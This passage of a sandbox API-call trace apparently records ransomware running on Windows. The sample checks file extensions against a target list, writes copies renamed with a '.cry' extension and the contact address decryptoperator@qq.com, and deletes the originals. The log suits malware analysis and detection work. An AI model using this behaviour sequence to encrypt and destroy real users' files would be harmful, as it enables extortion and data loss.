(lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.364] lstrlenW (lpString=".zip") returned 4 [0049.364] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.364] lstrlenW (lpString=".rar") returned 4 [0049.364] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.364] lstrlenW (lpString=".bz2") returned 4 [0049.364] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.364] lstrlenW (lpString=".7z") returned 3 [0049.364] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.364] lstrlenW (lpString=".dbf") returned 4 [0049.364] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.364] lstrlenW (lpString=".1cd") returned 4 [0049.364] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.364] lstrlenW (lpString=".jpg") returned 4 [0049.364] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.364] lstrlenW (lpString=".doc") returned 4 [0049.364] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.364] lstrlenW (lpString=".docx") returned 5 [0049.364] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.364] lstrlenW (lpString=".pdf") returned 4 [0049.364] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.364] lstrlenW (lpString=".xls") returned 4 [0049.364] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.365] lstrlenW (lpString=".xlsx") returned 5 [0049.365] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.365] lstrlenW (lpString=".ppt") returned 4 [0049.365] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.365] lstrlenW (lpString=".zip") returned 4 [0049.365] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.365] lstrlenW (lpString=".rar") returned 4 [0049.365] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.365] lstrlenW (lpString=".bz2") returned 4 [0049.365] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.365] lstrlenW (lpString=".7z") returned 3 [0049.365] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.365] lstrlenW (lpString=".dbf") returned 4 [0049.365] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.365] lstrlenW (lpString=".1cd") returned 4 [0049.365] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.365] lstrlenW (lpString=".jpg") returned 4 [0049.365] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.369] lstrcmpiW (lpString1=".CHM", lpString2=".cry") returned -1 [0049.369] lstrlenW (lpString="VBOB6.CHM") returned 9 [0049.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0049.371] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=123956) returned 1 [0049.371] CloseHandle (hObject=0x1ac) returned 1 [0049.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 0x20 [0049.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.371] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0049.371] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.371] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.371] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.372] GetLastError () returned 0x0 [0049.372] ReadFile (in: hFile=0x1ac, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x1e434, lpOverlapped=0x0) returned 1 [0049.467] WriteFile (in: hFile=0x200, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1e440, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1e440, lpOverlapped=0x0) returned 1 [0049.470] ReadFile (in: hFile=0x1ac, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.470] WriteFile (in: hFile=0x200, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.470] SetEndOfFile (hFile=0x200) returned 1 [0049.470] CloseHandle (hObject=0x200) returned 1 [0049.470] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.470] SetEndOfFile (hFile=0x1ac) returned 1 [0049.471] CloseHandle (hObject=0x1ac) returned 1 [0049.471] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0049.472] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 1 [0049.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.472] lstrlenW (lpString=".doc") returned 4 [0049.472] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.472] lstrlenW (lpString=".docx") returned 5 [0049.472] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.472] lstrlenW (lpString=".pdf") returned 4 [0049.472] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.472] lstrlenW (lpString=".xls") returned 4 [0049.472] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.472] lstrlenW (lpString=".xlsx") returned 5 [0049.472] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.472] lstrlenW (lpString=".ppt") returned 4 [0049.472] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.472] lstrlenW (lpString=".zip") returned 4 [0049.472] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.472] lstrlenW (lpString=".rar") returned 4 [0049.472] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.472] lstrlenW (lpString=".bz2") returned 4 [0049.472] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.472] lstrlenW (lpString=".7z") returned 3 [0049.472] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.472] lstrlenW (lpString=".dbf") returned 4 [0049.472] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.472] lstrlenW (lpString=".1cd") returned 4 [0049.472] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.473] lstrlenW (lpString=".jpg") returned 4 [0049.473] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.473] lstrlenW (lpString=".doc") returned 4 [0049.473] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.473] lstrlenW (lpString=".docx") returned 5 [0049.473] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.473] lstrlenW (lpString=".pdf") returned 4 [0049.473] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.473] lstrlenW (lpString=".xls") returned 4 [0049.473] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.473] lstrlenW (lpString=".xlsx") returned 5 [0049.473] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.473] lstrlenW (lpString=".ppt") returned 4 [0049.473] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.473] lstrlenW (lpString=".zip") returned 4 [0049.473] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.473] lstrlenW (lpString=".rar") returned 4 [0049.473] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.473] lstrlenW (lpString=".bz2") returned 4 [0049.473] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.473] lstrlenW (lpString=".7z") returned 3 [0049.473] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.473] lstrlenW (lpString=".dbf") returned 4 [0049.473] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.473] lstrlenW (lpString=".1cd") returned 4 [0049.473] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.473] lstrlenW (lpString=".jpg") returned 4 [0049.473] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.474] lstrcmpiW (lpString1=".bmp", lpString2=".cry") returned -1 [0049.474] lstrlenW (lpString="verisign.bmp") returned 12 [0049.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0049.484] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=2702) returned 1 [0049.484] CloseHandle (hObject=0x1c4) returned 1 [0049.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp")) returned 0x20 [0049.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.485] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.485] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.485] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.485] lstrlenW (lpString=".doc") returned 4 [0049.485] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0049.485] lstrlenW (lpString=".docx") returned 5 [0049.485] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0049.485] lstrlenW (lpString=".pdf") returned 4 [0049.485] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0049.485] lstrlenW (lpString=".xls") returned 4 [0049.485] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0049.485] lstrlenW (lpString=".xlsx") returned 5 [0049.485] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0049.485] lstrlenW (lpString=".ppt") returned 4 [0049.485] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0049.485] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.485] lstrlenW (lpString=".zip") returned 4 [0049.485] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0049.485] lstrlenW (lpString=".rar") returned 4 [0049.485] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0049.485] lstrlenW (lpString=".bz2") returned 4 [0049.485] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0049.486] lstrlenW (lpString=".7z") returned 3 [0049.486] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0049.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.486] lstrlenW (lpString=".dbf") returned 4 [0049.486] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0049.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.486] lstrlenW (lpString=".1cd") returned 4 [0049.486] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0049.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.486] lstrlenW (lpString=".jpg") returned 4 [0049.486] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0049.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.486] lstrlenW (lpString=".doc") returned 4 [0049.486] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0049.486] lstrlenW (lpString=".docx") returned 5 [0049.486] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0049.486] lstrlenW (lpString=".pdf") returned 4 [0049.486] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0049.486] lstrlenW (lpString=".xls") returned 4 [0049.486] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0049.486] lstrlenW (lpString=".xlsx") returned 5 [0049.486] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0049.486] lstrlenW (lpString=".ppt") returned 4 [0049.486] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0049.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.486] lstrlenW (lpString=".zip") returned 4 [0049.486] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0049.486] lstrlenW (lpString=".rar") returned 4 [0049.486] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0049.486] lstrlenW (lpString=".bz2") returned 4 [0049.486] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0049.486] lstrlenW (lpString=".7z") returned 3 [0049.486] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0049.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.486] lstrlenW (lpString=".dbf") returned 4 [0049.486] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0049.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.487] lstrlenW (lpString=".1cd") returned 4 [0049.487] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0049.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0049.487] lstrlenW (lpString=".jpg") returned 4 [0049.487] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0049.487] lstrcmpiW (lpString1=".inc", lpString2=".cry") returned 1 [0049.487] lstrlenW (lpString="adovbs.inc") returned 10 [0049.487] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0049.534] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=14951) returned 1 [0049.534] CloseHandle (hObject=0x1c4) returned 1 [0049.534] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc")) returned 0x20 [0049.534] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.534] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.534] lstrlenW (lpString=".doc") returned 4 [0049.534] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0049.534] lstrlenW (lpString=".docx") returned 5 [0049.534] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0049.534] lstrlenW (lpString=".pdf") returned 4 [0049.534] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0049.534] lstrlenW (lpString=".xls") returned 4 [0049.534] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0049.534] lstrlenW (lpString=".xlsx") returned 5 [0049.534] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0049.534] lstrlenW (lpString=".ppt") returned 4 [0049.534] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0049.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.534] lstrlenW (lpString=".zip") returned 4 [0049.534] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0049.534] lstrlenW (lpString=".rar") returned 4 [0049.534] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0049.535] lstrlenW (lpString=".bz2") returned 4 [0049.535] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0049.535] lstrlenW (lpString=".7z") returned 3 [0049.535] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0049.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.535] lstrlenW (lpString=".dbf") returned 4 [0049.535] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0049.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.535] lstrlenW (lpString=".1cd") returned 4 [0049.535] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0049.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.535] lstrlenW (lpString=".jpg") returned 4 [0049.535] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0049.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.535] lstrlenW (lpString=".doc") returned 4 [0049.535] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0049.535] lstrlenW (lpString=".docx") returned 5 [0049.535] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0049.535] lstrlenW (lpString=".pdf") returned 4 [0049.535] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0049.535] lstrlenW (lpString=".xls") returned 4 [0049.535] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0049.535] lstrlenW (lpString=".xlsx") returned 5 [0049.535] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0049.535] lstrlenW (lpString=".ppt") returned 4 [0049.535] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0049.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.535] lstrlenW (lpString=".zip") returned 4 [0049.535] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0049.535] lstrlenW (lpString=".rar") returned 4 [0049.535] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0049.535] lstrlenW (lpString=".bz2") returned 4 [0049.535] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0049.535] lstrlenW (lpString=".7z") returned 3 [0049.535] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0049.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.536] lstrlenW (lpString=".dbf") returned 4 [0049.536] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0049.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.536] lstrlenW (lpString=".1cd") returned 4 [0049.536] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0049.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0049.536] lstrlenW (lpString=".jpg") returned 4 [0049.536] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0049.536] lstrcmpiW (lpString1=".inc", lpString2=".cry") returned 1 [0049.536] lstrlenW (lpString="adcvbs.inc") returned 10 [0049.536] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0049.551] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=623) returned 1 [0049.551] CloseHandle (hObject=0x190) returned 1 [0049.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc")) returned 0x20 [0049.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.551] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.551] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.551] lstrlenW (lpString=".doc") returned 4 [0049.551] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0049.551] lstrlenW (lpString=".docx") returned 5 [0049.552] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0049.552] lstrlenW (lpString=".pdf") returned 4 [0049.552] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0049.552] lstrlenW (lpString=".xls") returned 4 [0049.552] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0049.552] lstrlenW (lpString=".xlsx") returned 5 [0049.552] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0049.552] lstrlenW (lpString=".ppt") returned 4 [0049.552] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0049.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.552] lstrlenW (lpString=".zip") returned 4 [0049.552] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0049.552] lstrlenW (lpString=".rar") returned 4 [0049.552] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0049.552] lstrlenW (lpString=".bz2") returned 4 [0049.552] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0049.552] lstrlenW (lpString=".7z") returned 3 [0049.552] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0049.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.552] lstrlenW (lpString=".dbf") returned 4 [0049.552] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0049.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.552] lstrlenW (lpString=".1cd") returned 4 [0049.552] lstrcmpiW 